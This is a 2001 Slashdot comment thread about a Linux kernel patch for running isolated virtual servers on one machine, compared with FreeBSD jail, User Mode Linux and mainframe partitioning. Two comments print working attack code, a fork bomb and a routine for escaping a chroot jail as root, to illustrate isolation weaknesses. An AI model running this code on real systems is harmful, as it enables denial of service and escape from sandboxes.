Linux Software

One-Machine Linux Cluster

An AC wrote: "Forget Beowulf clusters: Jacques Gelinas has made available a kernel patch that enables many virtual servers to run on the same machine, even under the same kernel. Read his original message posted to the Linux kernel list." Imagine what this will mean for hosting companies...
  • by havardi ( 122062 ) on Wednesday November 07, 2001 @01:08AM (#2531355)
    haha.. better read the fine print and make sure you actually get your own *computer* including box and power supply, and motherboard -- or you may end up sharing your box with 100 other ppl :-P
  • *BSD Jail? (Score:2, Insightful)

    Isn't this like the BSDs' jail() syscall?
  • As far as I know... this was supposed to be one of the big wins for the mainframes... I recall some note about 44000 Linuxes running together on a single IBM mainframe? Sorry, don't have the link handy...
  • Beowulf clusters of virtual Beowulf clusters of virtual Beowulf clusters.

    On a more serious note, though, this still does not give you the advantages a dedicated server does. You do not have the dedicated *hardware* resources and it is likely much slower than just going the "chroot route" (due to all of these virtual machines on one server...)
  • Very Useful (Score:5, Insightful)

    by Gregg Alan ( 8487 ) on Wednesday November 07, 2001 @01:12AM (#2531374)
    Slashdotted before I could read the whole thing. :( But, as a sysadmin for a smallish web development/hosting company I could REALLY use some separation between certain clients. Sure, this isn't ready for production systems, but one day it may be.

    The patch author is right...modern CPUs (for my industry) have PLENTY of power. What I hate is having to run some third party app for a client (even in a Linux environment) that *might* affect the whole machine. This patch holds the promise that I won't have as much to worry about.

    Yes, this is a good thing.
    • Re:Very Useful (Score:2, Informative)

      by btellier ( 126120 )
      What I hate is having to run some third party app for a client (even in a Linux environment) that *might* affect the whole machine.

      If this is your problem, you're not running the right apps. For modern production machines the problem is usually running Exchange/Sendmail instead of Qmail, or MSDNS instead of DJBDNS (OK, maybe I'm partial to DJ Bernstein's apps). The only thing you might overload on is web servers, and if you're running Apache you've got such good code behind you that your CPU is probably the bottleneck.

      The answer for production servers is not "separation between clients" but rather choosing apps which are efficient. Name any app likely to be run on a high-traffic machine and I can give you a specific UN*X app which will do it with very little waste.

    • Processor power aside, imagine running 6-12 V-Linux machines on that cheap 2-processor P-III.

      You can easily run 12 websites on an SMP P-III 866, and if each boots off of separate partitions (or even separate SCSI drives for more separation!) that would rock.

      The only problem I see is that User C can rob processor time from Users A and B by simply recompiling the kernel with a make -j2.

      I wonder what plans are in the works to prevent machine A from mounting machine B's hard drive partitions, sniffing the Ethernet traffic, or even dumping the contents of memory.
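
      In the meantime, the only lever on the host side is ordinary Unix priority: root on the main server can deprioritize everything a greedy user owns. A minimal sketch (the helper name is mine; nothing like it ships with the patch):

      #include <sys/time.h>
      #include <sys/resource.h>
      #include <sys/types.h>
      #include <stdio.h>

      /* Renice every existing process owned by one UID. A blunt
       * instrument: nice values are advisory, and fresh logins start
       * unaffected, unlike a real per-context scheduler limit. */
      int deprioritize_user(uid_t uid)
      {
          if (setpriority(PRIO_USER, uid, 19) == -1) {
              perror("setpriority");
              return -1;
          }
          return 0;
      }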
    • Wholeheartedly agree. It would also perfectly cover the market between colocation and virtual web hosting.

      Currently, the only choices we have are colocation and virtual web server hosting. Colocation is way too expensive, and virtual hosting does not offer enough flexibility. It's hard to get any services that are not offered as part of the hosting company's smorgasbord.

      Virtual hosts like this would be perfect for tinkerers who can build all the stuff by themselves, without having to fork out for a rackmount server, precious rack space, and expensive colo fees.
  • by Anonymous Coward
    Here [sourceforge.net] is another project that just turns the kernel into another runnable process. You need to have a filesystem for it to mount and run with (available at the site) and from there you can have it run just about everything you can under the main host (within reason). It can be totally isolated, networked, and/or use its own hostfs to read directly from the host system's directory tree.
  • by inhalent ( 88094 ) on Wednesday November 07, 2001 @01:15AM (#2531383) Homepage
    Basically the same idea as Galaxy. Check it out for ideas... http://www.openvms.compaq.com/availability/galaxy.html
  • by Ekman ( 60679 )
    It's nice to see Linux finally catching up. FreeBSD has had this functionality for over a year and a half.

    Take a look at the jail(8) [freebsd.org] and jail(2) [freebsd.org] manpages.


    • Jail isn't the same as this. If you read the jail manpages, they give lots of examples of how running with a jail involves very interesting problems for some uses. This different technique has different problems for other uses, and does some things nicely that jail does not. And User Mode Linux is different again, and better for yet other purposes.
  • by Genady ( 27988 ) <(moc.cam) (ta) (sregor.yrag)> on Wednesday November 07, 2001 @01:19AM (#2531396)
    This has just about zero to do with clustering; if anything, this is the opposite of clustering. However, this IS very, very interesting for web hosts and just about anyone else that wants to create and maintain multiple environments for development, test, etc. Imagine being able to carve up a mid-range machine like you can an S/390 (or another mainframe-class machine like Sun's E10/15K). So suppose IBM takes this and runs with it. Linux is already ported to RS/6000 and AS/400, so now you could get 8 processors of RS/6000 goodness, run production on 4 processors, Test on 2 processors, and Dev on 2 processors.

    The devil will be in how you refresh test and dev from production, but that can probably be done inside Logical Volume Manager.

    This is very, very cool stuff; it will be very interesting to see how it stacks up against the big boys in the virtual machine space.
    • Just to clarify a little, Sun E10/15k's are not directly comparable in the way multiple servers run in the same chassis. If you were to combine all of the system boards in an E10/15k and then run virtual servers in a single copy of Solaris (I'm not aware of anything that allows you to do this) then it would be comparable.

      The way most E10/15 installations are used is to split the chassis, which supplies redundant power, management bus (JTAG) and a centreplane configuration for data and address buses, among several system boards. Each combination of system boards is used to run a completely separate OS installation. Even the data and address busses are physically separated from each other, rather than logically as in the article or an S390. It is a very rare error that will take the entire chassis down, providing superior uptimes. For the article, if there was a data or address bus error for one virtual machine, all of them would be affected, since it's the same physical hardware. This is not the case for an E10/15k.

      You could, theoretically, split one chassis into lots of system boards and run lots of Solaris instances in a cluster, but that wouldn't be nearly as powerful as putting all the boards into a dirty big SMP Solaris instance. Solaris SMP is pretty darn cool, IMHO.

    • by Doktor Memory ( 237313 ) on Wednesday November 07, 2001 @02:10AM (#2531480) Journal
      now you could get 8 processors of RS/6000 goodness, run production on 4 processors, Test on 2 processors, and Dev on 2 processors.

      What you're suggesting is pretty much the opposite of how this package works. As the author himself states, you cannot dedicate hardware resources to a vserver. Only one kernel is ever running, and you use all of your cpus or none. Process- and user-space isolation is provided, but if a process in one vserver tickles a kernel bug that crashes the system, the whole ball of wax will come down with that vserver. (Likewise, it's very likely that a kernel-level root exploit will allow you to break out of the vserver and attack the whole system.)

      Essentially, vserver is to the process space what chroot is to the filesystem layer.

      This is not inherently better or worse than the "system partitioning" approach; it's just a different approach, and will have different uses.
      • Hardware isolation (Score:3, Informative)

        by TBone ( 5692 )
        Yes, the patch doesn't support hardware dedication. But my Sun background makes me ponder a line of thought.

        In Solaris, there is the psr* family of commands for processor administration. psradm -f 0 will turn off processor 0. As long as this isn't physically powering down processors, but simply instructing the scheduler to disregard p0, you could, on the above VM, do something like:

        Prod: psradm -f 4,5,6,7
        Test: psradm -f 0,1,2,3,6,7
        Dev: psradm -f 0,1,2,3,4,5

        Leaving procs 0-3 for Prod, 4-5 for Test, and 6-7 for Dev.

        Along the same lines, at boot time you can explicitly state memory ranges to the kernel, if Linux can't detect your memory correctly or you have known bad memory you want to avoid. With the same thought, the Prod, Test, and Dev kernels could be brought up explicitly stating the 0-2G, 2-3G, and 3-4G ranges as usable memory addresses.

        You run into more problems when it comes to peripherals in the box, but how many serial ports do you really need? Just specify ttyS0 in the VM with the addresses of ttyS0,1,2 of the physical server.

        Am I smoking crack, or should I just stick with my much-more-hardware-flexible Sparc architecture :)
        • In Solaris, there is the psr* family of commands for processor administration. psradm -f 0 will turn off processor 0. As long as this isn't physically powering down processors, but simply instructing the scheduler to disregard p0, you could, on the above VM, do something like:

          Prod: psradm -f 4,5,6,7
          Test: psradm -f 0,1,2,3,6,7
          Dev: psradm -f 0,1,2,3,4,5

          Leaving procs 0-3 for Prod, 4-5 for Test, and 6-7 for Dev.

          I don't think that this could work with the vserver patches as they are currently implemented. There is still only one kernel and (important bit here) one scheduler running, so all of your assorted vservers will run on the total number of procs allotted to the scheduler.

          You might be able to hack up some sort of "vpsradm" command that instructed the scheduler to never assign processes from a certain vserver to a certain processor, but I suspect that such a thing is a lot easier to theorize about than to actually implement. (Actual kernel hackers are encouraged to add their two cents here.)
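
          As it happens, later kernels did grow exactly this primitive. A sketch against the modern sched_setaffinity(2) glibc interface (nothing like this existed in stock 2.4, and a real "vpsradm" would still have to apply it to every process in a context):

          #define _GNU_SOURCE
          #include <sched.h>
          #include <sys/types.h>
          #include <stdio.h>

          /* Pin one process to CPUs 0-3. Children inherit the mask, so
           * applying this to a vserver's topmost parent would confine
           * most of its subtree. */
          int pin_to_first_four_cpus(pid_t pid)
          {
              cpu_set_t mask;
              CPU_ZERO(&mask);
              for (int cpu = 0; cpu < 4; cpu++)
                  CPU_SET(cpu, &mask);
              if (sched_setaffinity(pid, sizeof(mask), &mask) == -1) {
                  perror("sched_setaffinity");
                  return -1;
              }
              return 0;
          }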
    • Like most Slashdot posters, you obviously didn't read the documentation before posting. On an 8-processor machine, this patch will give you 8 processors for each virtual server; it does /not/ implement CPU partitioning and explains the difference in the documentation.

      Also the main server can see all the files in the virtual servers since it isn't chrooted.

    • IBM is already running 15,000+ Linux servers (separate kernel and all) on a single piece of iron...

  • by josquint ( 193951 ) on Wednesday November 07, 2001 @01:19AM (#2531397) Homepage
    ... of clustering. It's... slicing your box up...
  • Why ask why? (Score:1, Redundant)

    by Mdog ( 25508 )
    I am displeased to see so many of you people replying and asking why this would be a good idea.

    The point is that this is *l337*. *That* is the point.

    If there happens to be a practical application, that is completely secondary. :)

    • I am displeased to see so many of you people replying and asking why this would be a good idea.
      The point is that this is *l337*. *That* is the point.

      Somehow I'm sure I could find a similar phrase in a "famous last words" collection somewhere ;-)

  • Is it similar to this (commercial, closed source) package [ensim.com] for redhat?

    I believe this package is very popular with webhosts. One user can totally hose his own virtual machine; the rest are not impacted. Trust me, I know.

  • User Mode Linux? (Score:4, Informative)

    by jmv ( 93421 ) on Wednesday November 07, 2001 @01:23AM (#2531414) Homepage
    Can anyone tell me how this is different than User Mode Linux [sourceforge.net]?
    • Re:User Mode Linux? (Score:4, Informative)

      by dispari ( 457014 ) <`moc.emoh' `ta' `1iodahs'> on Wednesday November 07, 2001 @02:07AM (#2531474)
      User Mode Linux is basically a VM. It uses virtual devices for hardware multiplexing. Read the "Alternative technologies/Virtual Machines" and "Alternative technologies/Limitations of those technologies" sections for why this is a different (and better, in some instances) solution.

      The vunify tool has significance when differentiating between VMs and this.
    • by Florian Weimer ( 88405 ) <fw@deneb.enyo.de> on Wednesday November 07, 2001 @02:31AM (#2531524) Homepage
      At the moment, User Mode Linux does not separate the processes in a VM from the host system. That's because the kernel image itself is writable by the processes running in a UML virtual machine, which means that processes can break out of the virtual machine pretty easily and gain access to the account running UML on the host system. In addition, even if this is corrected (perhaps it has been during the last few weeks, I haven't checked), the kernel memory would still be readable by the processes it runs, so different processes in the virtual machine could snoop on each other. This means that User Mode Linux is great for testing stuff, but it only moderately increases security.

      The patches for compartmentalization which mimic FreeBSD's jail(8) feature are completely different. If they are done properly (and checking this will require some time), they can provide complete separation of the processes running in different compartments. Performance is probably a bit better, too, because only one kernel is running, and not a stack of two.

      Again, if you need compartmentalization now, and you have security concerns, you should either use FreeBSD, or GNU/Linux on S/390. This new kernel feature will need a bit of time to settle down and work correctly (from a security point of view).
    • Chroot jails have their problems and annoyances. I've been toying around for a bit with the idea of using User Mode Linux as a security sandbox. This cluster-on-one-system looks even better, and a sibling comment to this one indicates that maybe User Mode isn't a safe jail anyway.

      Not having enough of a home DP center to dedicate one box as a firewall, I end up running local services (properly configured for local-only access, in addition to being firewalled for local only) on the same machine. I think I've done a good job, but there's always that nagging doubt. Putting my local services in a -safe- virtual OS would give me an additional level of comfort. Chroot jails are OK for standalone things like BIND, but once you have several services interacting, like a mail system, it gets a bit messy.
  • by Ghostx13 ( 255828 ) on Wednesday November 07, 2001 @01:27AM (#2531426)
    Hostpro, now Interland, has this sort of thing for FreeBSD. It used to be called vserver. The new improved version is called Freedom. It's been out for years.
    • hostpro/vserver/vservers... all the same thing. Now they have their own systems, but they used to just be resellers for iServer [iserver.com] (now viaverio [viaverio.com]).

      Right now, my site [cheathouse.com] and a friend's [systemvelocity.com] are each running on a Free/BSD split with about 10 other users - it's a virtual server, and I can install/do anything I feel like on it. I get:

      > FreeBSD 4.2-RELEASE (VKERN)
      and
      > BSDI BSD/OS 3.1 Virtual Kernel #17
      (they are discontinuing BSD/OS, AFAIK)
  • This concept is not new... A project known as FreeVSD has been in production for a while now.
    The software is released under the GPL, and is striving to be the most advanced and finely tuned web hosting system available.

    More information can be found here:
    http://www.freevsd.org/
  • mosix (Score:5, Interesting)

    by morcheeba ( 260908 ) on Wednesday November 07, 2001 @01:31AM (#2531430) Journal
    I wonder how this would work with mosix [mosix.com]... it could be a dream system!

    You could use mosix to combine the compute resources of several boxes to look like one box. And then, you could use this to divvy up the space so that people don't step on each other. When anyone (working in their own space) kicks off a large compile, the load would transparently be distributed among all the boxen.

    Of course, I have zippo experience with any of this, but it sounds possible.
    • I have a gut feeling that there would be a significant amount of work necessary before this would be feasible. As cool as it may be, it is absolutely essential that either network memory or some sort of uber-slick inter-virtual-server communication about necessary and future memory requirements, as well as super-slick process movements, be hashed out.

      If you have N machines and greater than N users, it's probably better to install a batch system. There is already a shitload of flexibility in the _current_ UNIX environment especially WRT linking together of multiple machines. No need to mess with the absolute barebones with two patches, eh?
    • Compaq recently announced that they are working on Single System Image clustering for Linux, which does make several boxes look like one - same PID space, shared IP addresses, shared memory, shared devices and filesystem etc.
      • hmm,

        Plan 9 is a distributed architecture. You don't need one PID space; that all sounds terribly overcomplicated.

        On Plan 9 you can happily debug code running on any of MIPS, SPARC, Motorola 68020, or Intel 386 from any other Plan 9 box (permissions granted, of course).

        Multi-threading isn't the only way to build a big application.
  • i use an "appliance server" at mediatemple.net [mediatemple.net] that uses the same sort of thing. just a small, isolated linux os on a shared box. works great! i'm fairly sure they use technology developed by ensim. [ensim.com] read up on it here. [ensim.com] nice to see this made available elsewhere though...
  • by L-Wave ( 515413 )
    What would happen if you ran a fork bomb on one of the virtual servers? Would it bring the whole physical machine down, or just the virtual machine?
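
    For reference, the attack in question is tiny (a sketch for illustration; don't run it anywhere you care about):

    #include <unistd.h>

    /* Classic fork bomb: every process loops forever creating children
     * until the process table fills. On a stock kernel, a per-user
     * RLIMIT_NPROC (see setrlimit(2)) contains it; whether the vserver
     * patch enforces such a limit per context is exactly the question. */
    int main(void)
    {
        for (;;)
            fork();
    }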
  • This is... (Score:1, Insightful)

    by keepper ( 24317 )


    EXACTLY what the FreeBSD jail() call does...

    Basically chroot on steroids...

    Well, it is good the Linux crowd took such a good idea over... if only they would now take the concept of having three branches (RELEASE, STABLE, CURRENT) to the kernel...

    On another note though... with Linux's history of rootkits, this is certainly something I would not use for a commercial offering...

    • by Anonymous Coward
      if only they would now take the concept of having three branches (RELEASE, STABLE, CURRENT) to the kernel...


      (2.0, 2.2, 2.4)
    • Re:This is... (Score:2, Informative)

      by psamuels ( 64397 )
      EXACTLY what the FreeBSD jail() call does...

      And you can do most of the same in Linux, with good old-fashioned chroot plus capabilities. No need for a separate system call.


      Restricting to a specific IP address is a nice touch, and one thing Linux capabilities can't do, but it seems rather application-specific. It only allows one IP alias to the jailed process, and doesn't seem to cover any non-IPv4 addressing. And WTF do you have to specify a hostname? The kernel needs this information? (Or does the (2) in jail(2) not actually mean it's a syscall, like it doesn't in AIX?)


      I'm also not sure if Linux capabilities are fine-grained enough to keep root from escaping a chroot without totally crippling it - but then again, jail() seems pretty crippling too. A virtual host server really shouldn't need root privs, other than bind-to-low-ports, and Linux capabilities do have that granularity.
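
      For the curious, the old-fashioned recipe looks roughly like this (a minimal sketch, not a hardening guide; the helper name is made up):

      #include <sys/types.h>
      #include <unistd.h>
      #include <stdio.h>

      /* Enter a chroot jail and drop root. The chdir() before chroot()
       * and the setgid()/setuid() afterwards are all essential: a process
       * that keeps root, or a cwd outside the jail, can escape. */
      int enter_jail(const char *jaildir, uid_t uid, gid_t gid)
      {
          if (chdir(jaildir) == -1)  { perror("chdir");  return -1; }
          if (chroot(jaildir) == -1) { perror("chroot"); return -1; }
          if (setgid(gid) == -1)     { perror("setgid"); return -1; }
          if (setuid(uid) == -1)     { perror("setuid"); return -1; }
          return 0;
      }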

  • This is pretty sad.
    Firstly, you're an idiot if you still haven't realized staff comments aren't in italics.

    Secondly, Beowulf clusters were only mentioned because they are the complete opposite of the subject matter:

    Beowulf clusters bring the computing power of several computers together for a single task, whereas with this a single computer could be used for several isolated tasks.

    Some of you should hand over your geek badges, right now.

  • IBM has been doing this for some time [ibm.com] on their mainframes, where it actually makes sense because of the massive amounts of processing power.
    • by KMSelf ( 361 ) <karsten@linuxmafia.com> on Wednesday November 07, 2001 @05:08AM (#2531726) Homepage

      It's the control over it.

      Mainframes have insane amounts of control over user processes (a Linux image essentially becomes the same), as well as the ability to allocate more or fewer resources, provide fine-grained process accounting, shut down processes, and migrate them elsewhere (part of the IBM datacenter Linux concept is the ability to migrate nodes around the country as needed).

      What a mainframe doesn't have to offer is insane amounts of processor power or memory. Disk and disk I/O are quite another matter -- the amount of aggregate bandwidth a z390 has to offer is impressive.

      PC-based virtualization clearly has some advantages, though not all of those offered by a mainframe. A rack of virtualized PCs probably does offer a higher processor density than the equivalent mainframe, however.

  • Think about a system where you want to use IP filter to control which network hosts/ports a service (or the hacker that has cracked your service) can access.

    If it addresses many of the issues that normal chroot has, then it may be good.

    Isolation of applications from each other.

    It's going to be interesting to see how much overhead this has when compared to VMware, User Mode Linux, or just chroots. (Tried 'em all.)

    If the overhead of this is not higher than chroot then it will be a big win.
  • I could be mistaken here, but it is my impression that any user can spin off a virtual machine.

    What happens in the following scenario:

    A user spins off a vserver, specifying the IP address of the default gateway for the parent server. The user then somehow convinces the parent server that it really *is* the gateway, and effectively takes the parent server off the network. If this is possible, someone without physical access to the network, but with an unprivileged login to the parent server, could effectively perform a DoS attack on it.

    I must be missing something here. It can't be this simple. Can anyone point out where I've gone wrong?
  • Co-location is kinda pricey, but use Linux enabled with domains and you could split the cost with other people. Then nobody has to bitch about ROOT access. If I ran a small ISP, I could offer Linux domains as cheap virtual servers. If someone messed up a domain, just restore from the nightly backup and they are up and running. Get a couple of dual-proc boxes with dual NICs (inet/NFS+backup) and a 60 gig (RAIDed?). Make 2 gigs per domain, and NFS-mount the /home dirs on some NAS. If you could get the backups working, where handling domains is like handling files - just copy and go - this could be a powerful tool for the busy admin.
    -
    Sometimes I've believed as many as six impossible things before breakfast. -Lewis Carroll (1832 - 1898)
  • -May run various network services, binding to the same ports without special configuration.


    What!?!? What happens when you bind, say, sshd to port 22 on multiple servers? Do you also need multiple Ethernet cards and IP addresses? The docs don't say anything about that...
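
    Presumably each vserver is tied to its own IP address (the jail discussion elsewhere in this thread mentions one IP per context), so each sshd ends up bound to port 22 on a different address instead of on INADDR_ANY. The difference, sketched (the address is an example):

    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <string.h>
    #include <sys/socket.h>

    /* Bind port 22 on one specific address rather than INADDR_ANY.
     * Several daemons can coexist on the same port this way, as long
     * as each sticks to its own vserver's IP. */
    int listen_on(const char *ip)
    {
        int fd = socket(AF_INET, SOCK_STREAM, 0);
        struct sockaddr_in sa;

        memset(&sa, 0, sizeof(sa));
        sa.sin_family = AF_INET;
        sa.sin_port = htons(22);
        sa.sin_addr.s_addr = inet_addr(ip);   /* e.g. "10.0.0.1", not 0.0.0.0 */
        if (fd == -1 || bind(fd, (struct sockaddr *)&sa, sizeof(sa)) == -1)
            return -1;
        return listen(fd, 5) == -1 ? -1 : fd;
    }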
  • When we upgrade databases, we assign a dedicated server because we don't want to use up all the CPU horsepower. If we ran a Linux with virtual domains, we could upgrade on the same box without using up all the resources, and the box could stay in production. Though the article said there is a drawback with the shared filesystem; allow some kind of snapshotting of filesystems and you would have a very powerful combination. If you could move a snapshot filesystem to a domain, you could test, upgrade, whatever. Interesting idea.

    BTW, if you have a Sun StarFire with domains plugged into an EMC terabyte storage, you spent millions to do just that!
  • I don't really know how they do it, but a number of hosting companies offer VPSs -- like 32 virtual computers hosted with one computer. I have an account like this myself, and it's a fairly economical way to get a very flexible host.

    It seems like this is the same kind of thing this person is talking about...? Is this more general in some way? What exactly is my host using anyway?

  • Security flaws (Score:2, Interesting)

    by BuGless ( 31232 )
    Having these calls available to non-root opens up a can of worms. The system provided looks clean, except he should limit its execution with yet another capability.
  • by the frizz ( 242326 ) on Wednesday November 07, 2001 @03:58AM (#2531641)
    My particular interest was to find virtual hosting solutions that would (1) not allow one runaway virtual server to deny the others at least a predefined minimum level of CPU, RAM and I/O (disk and network) resources, and (2) give any one virtual server extra resources if they were available. From my reading of other Slashdotters' postings and the info on the web, I've summarized below the various virtual server hosting solutions mentioned. Someone who has actually used these products should correct me.

    Linux can natively be configured to enforce disk quotas and (with more difficulty) [linuxdoc.org] manage network bandwidth [linuxjournal.com] without any special virtual server software. Also the native unix process scheduling algorithm does reduce the priority of CPU bound tasks. The getrlimit(2) system call can be used to set various limits per process (not per virtual server unless the virtual server runs as one process I guess.) I know of no way to specifically limit disk bandwidth on Linux.

    Freeware such as s_context [solucorp.qc.ca] and user mode linux [sourceforge.net] provide no control over how much resources one virtual server gets over another besides disk usage. Other limited resources like CPU, disk and network bandwidth (RAM?) are shared just like they would be shared by separate processes under a single Linux system.

    FreeVSD [freevsd.org] is not a virtual server, but a collection of scripts, binaries and multiple copies of hard-linked read-only filesystems for the common system environment. It has the best chance of winning the total performance award but has no extra features for resource limits between systems.

    True virtual machines (e.g., VMware [vmware.com]) provide very good isolation, but I believe this leads to little sharing of excess unused resources between virtual servers. They also have poorer performance in general because so much emulation is done.

    The commercial, proprietary Private Server [ensim.com] product from Ensim [ensim.com] seems good from the marketing blurbs, which say that they have "their own guaranteed share of the servers resources, including CPU, memory and bandwidth". I wonder what the performance penalty for this is, and how much it costs? Can anyone comment?

    • Freeware such as s_context and user mode linux provide no control over how much resources one virtual server gets over another besides disk usage. Other limited resources like CPU, disk and network bandwidth (RAM?) are shared just like they would be shared by separate processes under a single Linux system.
      Yup, you're right. But you can cap individual users in the main system. User Bob could be limited to X% processor usage, etc. He's still root of his machine once he changes context, though. Run it as a script at boot before allowing him to log in, and his virtual machine is capped. I'm really liking the sound of this.
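
      The stock mechanism for that kind of cap is setrlimit(2); a sketch (note these are per-process limits inherited across fork, not a per-context percentage):

      #include <sys/time.h>
      #include <sys/resource.h>
      #include <stdio.h>

      /* Cap the calling process (and everything it forks) at 60 CPU
       * seconds and 64 processes. Limits are inherited, so calling this
       * before exec'ing a user's shell caps that whole subtree. */
      int cap_self(void)
      {
          struct rlimit cpu   = { 60, 60 };   /* soft, hard (seconds) */
          struct rlimit nproc = { 64, 64 };

          if (setrlimit(RLIMIT_CPU, &cpu) == -1)     { perror("RLIMIT_CPU");   return -1; }
          if (setrlimit(RLIMIT_NPROC, &nproc) == -1) { perror("RLIMIT_NPROC"); return -1; }
          return 0;
      }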
    • and user mode linux [sourceforge.net] provide no control over how much resources one virtual server gets over another besides disk usage

      That's wrong, you can specify RAM allocation in UML.
  • There is an article (Spanish only) commenting on this kernel feature here:

    http://www.hispacluster.org/modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=2 [hispacluster.org].

    In fact, this article was put together by collecting the opinions of many users who posted comments on this topic.

    I hope it gives you some ideas about the implications of this important feature for the future of Linux.
  • by mubes ( 115026 ) on Wednesday November 07, 2001 @05:15AM (#2531736) Homepage
    Much respect to this guy. He's taken something that's big, hairy and complex and looked at it from a different direction. Because he's got access to the source, he's been able to do something novel with it in what appears to be an efficient and simple way... you couldn't do that with any of the closed-source OSes out there today!

    The beauty of this is that there's *one* kernel running so, apart from any overhead of selecting the environment, you pretty much get the same performance as running native. This has got to have 1001 applications.

    One of the things I'd personally like to see is some kind of overlaid filesystem so each image by default gets /bin /lib etc. from a generic set but users can modify them if they need to - this would allow a sysadmin to keep the default system current while not preventing 'owners' of an individual image from being able to change things if they need to....I vaguely remember something like this for CDs - anyone got the details? Time for a bit of experimentation ;-)
  • by kris ( 824 ) <kris-slashdot@koehntopp.de> on Wednesday November 07, 2001 @07:40AM (#2531970) Homepage
    I wonder if it would be practical to associate absolute CPU time limits or CPU usage percentages with a security context ID, in order to prevent a certain security context from hogging all CPU resources.

    A similar thing would be desirable for resident set size (real RAM usage) and virtual size (process size) per security context.
  • It's called.. (Score:2, Insightful)

    JAIL(8)

    SYNOPSIS
        jail path hostname ip-number command ...

    DESCRIPTION
        The jail command imprisons a process and all future descendants.
        Please see the jail(2) man page for further details.
    ...

    FreeBSD 4.4                       April 28, 1999
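
    And the underlying syscall, roughly as the 4.x-era jail(2) man page describes it (a sketch: the path, hostname and address here are invented, and details such as the byte order expected in ip_number varied between releases, so check a real man page):

    #include <sys/types.h>
    #include <sys/param.h>
    #include <sys/jail.h>
    #include <arpa/inet.h>
    #include <stdio.h>
    #include <unistd.h>

    int main(void)
    {
        struct jail j;

        j.version   = 0;                        /* struct version in 4.x */
        j.path      = "/usr/jails/vhost1";      /* becomes the jail's root */
        j.hostname  = "vhost1.example.com";
        j.ip_number = inet_addr("10.0.0.1");    /* byte order: check jail(2) */
        if (jail(&j) == -1) {
            perror("jail");
            return 1;
        }
        execl("/bin/sh", "sh", (char *)NULL);   /* imprisoned from here on */
        return 1;
    }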
  • by noz ( 253073 )

    Forget arguing about the definition of a 'cluster'. This is the technology that differentiates between PCs, servers, and mainframes.

    IBM and Unisys mainframes (perhaps others, I've worked with these) have hardware partitions where CPUs are divided up. Linux is there now too.

  • chroot safe? (Score:2, Interesting)

    by tal197 ( 144614 )
    The documentation says...


    Unix and Linux have always had the chroot() system call. This call was used to trap a process into a sub-directory. After the system-call, the process is led to believe that the sub-directory is now the root directory. This system call can't be reversed. In fact, the only thing a process can do is trap itself further and further in the file-system (calling chroot() again).

    And...

    The vserver is trapped into a sub-directory of the main server and can't escape. This is done by the standard chroot() system call found on all Unix and Linux boxes.


    But I thought you couldn't (safely) run root processes in a chroot jail, because escape is easy if you can call chroot? E.g., create a subdirectory in your jail and chroot to that (keeping the same current directory), then chroot("../../../../") to get out of jail. Is it really safe to give someone the root password to a vserver in this system?
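
    The worry is well founded; for a process that keeps root, the well-known escape goes roughly like this (a sketch, for illustration only):

    #include <sys/stat.h>
    #include <sys/types.h>
    #include <unistd.h>

    /* Classic chroot() escape for a root process: chroot() into a
     * subdirectory WITHOUT chdir()ing into it, so the cwd stays outside
     * the new root, then climb to the true root and chroot() there. */
    int escape(void)
    {
        mkdir("hole", 0700);
        chroot("hole");             /* cwd is now outside the jail */
        for (int i = 0; i < 64; i++)
            chdir("..");            /* walk up to the real root */
        return chroot(".");         /* 0 on success: out of jail */
    }

    So unless the patch also restricts further chroot() calls (or strips the relevant capability) inside a security context, handing out vserver root would carry exactly this risk.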

  • Could this be used to give every remotely downloaded app a virtual machine, sort of like a Java VM? As an advantage over Java, with IPv6 you could give every app its own class C network off your 1-billion-IP block.
  • Another use that hasn't been mentioned here is testing your failover systems. Now, instead of buying two machines, you can buy one and simulate crashes to test the failover. Very useful stuff.

    Note: for most packages there are ways to do this anyway, but they can become a PITA.
  • by ncon ( 159906 )
    This is much like the jail() of BSD. This does not give any of the benefits of a clustering arrangement. That is, the benefit of having a cluster is that you can distribute processes across multiple machines and run from a common storage server. Although this technology is very useful (and can be applied in all sorts of ways - we run BIND in a jail), it does not provide extra process space if only running on one machine.

    Having sufficient RAM is the largest factor in commodity-grade webhosting services, so having multiple instances of a cluster on the same machine does not really make sense, when the whole point of a cluster is to give faster computation and access time.

    btw- we offer both of these services here [imeme.net], and we do it on FreeBSD [freebsd.org].
  • Sun has machines entirely built around the concept of virtual hosts. Of course, they stole the idea from the mainframe world, where this has been going on for decades. I don't know of any systems that currently allow splitting a single CPU between domains, but I honestly don't see it as much of a benefit.

    Which is definitely not to say that it's a bad or late thing--it's nice to see Linux playing with the Big Boys (tm) now and again. Just don't think that it's ground-breaking technology.

  • During the course of my job, I have to recreate customer environments to duplicate their problems. Often these environments involve firewalls, NAT, or simply multiple subnets that are difficult and time-consuming to get past our IT guys (and even once we convince them of the need, it may be a week before any real progress is made on their end to set things up).

    However, using this, I can hopefully get a single box set up with several "systems" using internal virtual networks that will allow me to have something like...

    1: Server / Client Gateway
    2: Client

    3: Firewall / NAT / Router

    4: Client Gateway
    5: Client

    With 1 and 2 being "inside" the firewall and 4 and 5 being "outside".

    This would allow me to eliminate TONS of bureaucratic red-tape paperwork BS, and give a self-contained environment for some of my other coworkers to educate themselves on (95% of which have never done any actual hands-on work with a firewall or even done any routing).

    While all this could be easily accomplished using a multi-processor Sun box and their domain / partitioning scheme, those tend to be a little more pricey than the dual-P2 I've already got sitting idle in the corner of my office...

    Any comments on the feasibility of this scenario?

    Would this package work for what I'd like to do?

    Thanks...

    -l
  • How does this compare to both
    umlinux (I suspect this is not what's going on)
    and
    freevsd (Check it out)
    http://www.freevsd.org
  • Some extremely large, well-known hosting companies have trouble providing "reasonable" (trustworthy, timely, competent) support to corporate website virtual hosting clients, and I have repeatedly seen all hell break loose in the case of deadlines to push staging to the live server from many time zones away. For some reason I still don't understand, we were never allowed to touch the live server, so we never even knew its directory contents. Sheer hell. In this situation you seldom know if it's going to work on the live server (which is *not* the same as staging, no matter what was promised) until D-Day.

    I was even offered root access once to fix this provider's host but I had to refuse due to responsibility for all the other clients with virtual websites. The problems generally do not come from things that would crash a kernel, but from the economics of getting individuals to apply appropriate knowledge in the right place at the right time, within the context of a number of companies working together with their own agendas.

    Using this virtual server patch, I can see a *lot* of time, effort, danger, stress, complaints, etc. all swept away into history!

    Run virtual servers on your local dev box and the remote staging and live machines, then use rsync from local to staging. Ssh into staging and rsync again, or have the admin staff do so. But the live machine can be isolated network-wise, so it is more likely that the user could be allowed onto the live server themselves.

